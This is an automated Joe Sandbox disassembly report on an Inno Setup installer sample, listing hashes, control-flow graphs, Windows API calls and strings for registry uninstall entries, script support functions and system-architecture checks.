                                                                              • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                              • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                              • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                              • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                              • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                              • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                              • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                              • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                              • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                              • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                              • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                              • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                              • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                              • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                              • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                              • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 406 46e080-46e0b2 407 46e0b4-46e0bb 406->407 408 46e0cf 406->408 409 46e0c6-46e0cd 407->409 410 46e0bd-46e0c4 407->410 411 46e0d6-46e10e call 403634 call 403738 call 42dde8 408->411 409->411 410->408 410->409 418 46e110-46e124 call 403738 call 42dde8 411->418 419 46e129-46e152 call 403738 call 42dd0c 411->419 418->419 427 46e154-46e15d call 46dd50 419->427 428 46e162-46e18b call 46de6c 419->428 427->428 432 46e19d-46e1a0 call 403400 428->432 433 46e18d-46e19b call 403494 428->433 436 46e1a5-46e1f0 call 46de6c call 42c40c call 46deb4 call 46de6c 432->436 433->436 446 46e206-46e227 call 454ab8 call 46de6c 436->446 447 46e1f2-46e205 call 46dedc 436->447 454 46e27d-46e284 446->454 455 46e229-46e27c call 46de6c call 478464 call 46de6c call 478464 call 46de6c 446->455 447->446 457 46e286-46e2c3 call 478464 call 46de6c call 478464 call 46de6c 454->457 458 46e2c4-46e2cb 454->458 455->454 457->458 461 46e30c-46e331 call 40b44c call 46de6c 458->461 462 46e2cd-46e30b call 46de6c * 3 458->462 480 46e333-46e33e call 47ad88 461->480 481 46e340-46e349 call 403494 461->481 462->461 491 46e34e-46e51b call 403778 call 46de6c call 47ad88 call 46deb4 call 403494 call 40357c * 2 call 46de6c call 403494 call 40357c * 2 call 46de6c call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 480->491 481->491 556 46e531-46e53f call 46dedc 491->556 557 46e51d-46e52f call 46de6c 491->557 561 46e544 556->561 562 46e545-46e58e call 46dedc call 46df10 call 46de6c call 47ad88 call 46df74 557->562 561->562 573 46e5b4-46e5be 562->573 574 46e590-46e5ae call 46dedc * 2 562->574 575 46e5c4-46e5cb 573->575 576 46e662-46e669 573->576 590 46e5b3 574->590 578 46e62f-46e63a 575->578 579 46e5cd-46e5f1 call 430a40 575->579 580 46e6c3-46e6d9 RegCloseKey 576->580 581 46e66b-46e6a1 call 49314c 576->581 586 46e63d-46e641 578->586 579->586 592 46e5f3-46e5f4 579->592 581->580 586->576 587 46e643-46e65c call 430a7c call 46dedc 586->587 597 46e661 587->597 590->573 594 46e5f6-46e61c call 40b44c call 4780d8 592->594 601 46e61e-46e624 call 430a40 594->601 602 46e629-46e62b 594->602 597->576 601->602 602->594 604 46e62d 602->604 604->586
                                                                              APIs
                                                                                • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                              • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue
                                                                              • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                              • API String ID: 3132538880-1122008755
                                                                              • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                              • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                              • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                              • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1038 490d5a-490d67 call 403684 1029->1038 1039 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1039 1030->1028 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1038->1047 1048 490db0-490dbd call 403684 1038->1048 1056 490d55 1039->1056 1047->1028 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1066 490e68-490e75 call 403684 1057->1066 1067 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1067 1058->1028 1079 490ea2-490eaf call 403684 1066->1079 1080 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1066->1080 1067->1028 1094 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1079->1094 1095 490ef0-490efd call 403684 1079->1095 1080->1028 1094->1028 1107 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1095->1107 1108 490f44-490f51 call 403684 1095->1108 1107->1028 1119 490f98-490fa5 call 403684 1108->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1108->1120 1130 490ffa-491007 call 403684 1119->1130 1131 490fa7-490fc5 call 44684c call 42e2bc 1119->1131 1120->1028 1142 491009-491035 call 44684c call 403738 call 4467f0 GetProcAddress 1130->1142 1143 491081-49108e call 403684 1130->1143 1151 490fd7-490fe5 GetLastError call 446acc 1131->1151 1152 490fc7-490fd5 call 446acc 1131->1152 1176 491071-49107c call 446924 1142->1176 1177 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1177 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1163 490fea-490ff5 call 446acc 1151->1163 1152->1163 1157->1028 1169 4910e8-4910f5 call 403684 1158->1169 1170 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1170 1163->1028 1185 49112b-491138 call 403684 1169->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1169->1186 1170->1028 1176->1028 1177->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                              • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FindSleepWindow
                                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                              • API String ID: 3078808852-3310373309
                                                                              • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                              • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                              • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                              • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1577 481e86-481e8f 1574->1577 1576 481e2f-481e3a GetCurrentProcess 1575->1576 1575->1577 1576->1577 1586 481e3c-481e40 1576->1586 1578 481e9f-481ea6 1577->1578 1579 481e91-481e95 1577->1579 1582 481ec1-481ec6 1578->1582 1580 481ea8-481eaf 1579->1580 1581 481e97-481e9b 1579->1581 1580->1582 1584 481e9d-481eba 1581->1584 1585 481eb1-481eb8 1581->1585 1584->1582 1585->1582 1586->1577 1588 481e42-481e49 call 451d7c 1586->1588 1588->1577 1591 481e4b-481e58 GetProcAddress 1588->1591 1591->1577 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1577 1593 481e73-481e7a 1592->1593 1593->1577
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                              • API String ID: 2230631259-2623177817
                                                                              • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                              • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                              • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                              • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1597 47274c-472789 call 40b44c call 4780d8 1596->1597 1607 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1597->1607 1608 472e1a-472e20 1597->1608 1620 4727d4-4727db 1607->1620 1621 4727d0 1607->1621 1608->1595 1608->1597 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1628 47283c-472843 1626->1628 1629 472849-472850 1626->1629 1627->1626 1638 47281b-47282e call 403738 call 42dde8 1627->1638 1628->1629 1632 472cf7-472d2d 1628->1632 1633 4728a3-4728c3 call 47255c 1629->1633 1634 472852-472859 1629->1634 1632->1622 1640 472d33-472d3a 1632->1640 1648 472936-47293d 1633->1648 1649 4728c5-4728ea call 403738 call 42dd0c 1633->1649 1634->1633 1637 47285b-47287d call 403738 call 42dd44 1634->1637 1637->1632 1671 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1637->1671 1638->1626 1644 472d6d-472d74 1640->1644 1645 472d3c-472d46 call 472538 1640->1645 1653 472da7-472dae 1644->1653 1654 472d76-472d80 call 472538 1644->1654 1645->1644 1670 472d48-472d68 call 459ad4 1645->1670 1655 472986 1648->1655 1656 47293f-472963 call 403738 call 42dd44 1648->1656 1676 4728ef-4728f3 1649->1676 1658 472db0-472dd6 call 459ad4 1653->1658 1659 472ddb-472de2 1653->1659 1654->1653 1683 472d82-472da2 call 459ad4 1654->1683 1663 47298b-47298d 1655->1663 1656->1663 1692 472965-472968 1656->1692 1658->1659 1668 472de4-472e0a call 459ad4 1659->1668 1669 472e0f-472e15 call 477d78 1659->1669 1663->1632 1672 472993-4729a8 1663->1672 1668->1669 1669->1608 1670->1644 1671->1632 1681 4729bc-4729c3 1672->1681 1682 4729aa-4729b7 call 403738 RegDeleteValueA 1672->1682 1685 4728f5-4728f9 1676->1685 1686 47291a-472921 1676->1686 1689 472cd9-472cef RegCloseKey 1681->1689 1690 4729c9-4729d0 1681->1690 1682->1681 1683->1653 1685->1663 1693 4728ff-472918 call 47255c 1685->1693 1686->1663 1694 472923-472934 call 46dd50 1686->1694 1696 4729d2-4729e6 call 403738 call 42dc8c 1690->1696 1697 4729ec-4729f9 1690->1697 1692->1663 1699 47296a-472971 1692->1699 1693->1663 1694->1663 1696->1689 1696->1697 1697->1689 1700 4729ff 1697->1700 1699->1663 1704 472973-472984 call 46dd50 1699->1704 1700->1689 1705 472c26-472c41 call 47ad88 call 430acc 1700->1705 1706 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1700->1706 1707 472a22-472a2c 1700->1707 1708 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1700->1708 1704->1663 1739 472c43-472c48 call 4529a4 1705->1739 1740 472c4d-472c6d call 403738 RegSetValueExA 1705->1740 1706->1689 1752 472c03-472c0a 1706->1752 1713 472a35-472a3a 1707->1713 1714 472a2e-472a31 1707->1714 1708->1689 1756 472cbf-472cc6 1708->1756 1723 472a41-472a43 1713->1723 1720 472a33 1714->1720 1721 472a3c 1714->1721 1720->1723 1721->1723 1729 472ae0-472af2 call 40385c 1723->1729 1730 472a49-472a5b call 40385c 1723->1730 1744 472af4-472b0b call 403738 call 42dc80 1729->1744 1745 472b0d-472b10 call 403400 1729->1745 1748 472a76-472a79 call 403400 1730->1748 1749 472a5d-472a74 call 403738 call 42dc74 1730->1749 1739->1740 1740->1689 1758 472c6f-472c76 1740->1758 1744->1745 1762 472b15-472b4e call 47ada8 1744->1762 1745->1762 1761 472a7e-472a85 1748->1761 1749->1748 1749->1761 1752->1689 1759 472c10-472c21 call 46dd50 1752->1759 1756->1689 1763 472cc8-472cd4 call 46dd50 1756->1763 1758->1689 1765 472c78-472c89 call 46dd50 1758->1765 1759->1689 1768 472a87-472aa5 call 403738 RegQueryValueExA 1761->1768 1769 472ab6-472adb call 47ada8 1761->1769 1781 472b50-472b60 call 403574 1762->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1762->1782 1763->1689 1765->1689 1768->1769 1785 472aa7-472aab 1768->1785 1769->1782 1781->1782 1791 472b62-472b6a call 40357c 1781->1791 1782->1689 1797 472ba1-472ba8 1782->1797 1788 472ab3 1785->1788 1789 472aad-472ab1 1785->1789 1788->1769 1789->1769 1789->1788 1791->1782 1797->1689 1798 472bae-472bbf call 46dd50 1797->1798 1798->1689
                                                                              APIs
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteErrorLastValue$CloseCreate
                                                                              • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                              • API String ID: 2638610037-3092547568
                                                                              • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                              • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                              • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                              • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1842 4685c4 1822->1842 1825 4685d4-4685f9 call 42dc74 * 2 1823->1825 1826 46862b-468632 1823->1826 1845 4685fb-468604 call 478558 1825->1845 1846 468609-46861b call 42dc74 1825->1846 1828 468634-468646 call 42dc74 1826->1828 1829 468678-46867f 1826->1829 1843 468656-468668 call 42dc74 1828->1843 1844 468648-468651 call 478558 1828->1844 1831 468681-4686b5 call 42dc74 * 3 1829->1831 1832 4686ba-4686d0 RegCloseKey 1829->1832 1831->1832 1842->1823 1843->1829 1854 46866a-468673 call 478558 1843->1854 1844->1843 1845->1846 1846->1826 1858 46861d-468626 call 478558 1846->1858 1854->1829 1858->1826
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                              Strings
                                                                              • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                              • Inno Setup: App Path, xrefs: 0046858A
                                                                              • Inno Setup: Setup Type, xrefs: 004685DA
                                                                              • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                              • Inno Setup: User Info: Name, xrefs: 00468687
                                                                              • Inno Setup: Selected Components, xrefs: 004685EA
                                                                              • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                              • Inno Setup: No Icons, xrefs: 004685B3
                                                                              • Inno Setup: Icon Group, xrefs: 004685A6
                                                                              • Inno Setup: Deselected Components, xrefs: 0046860C
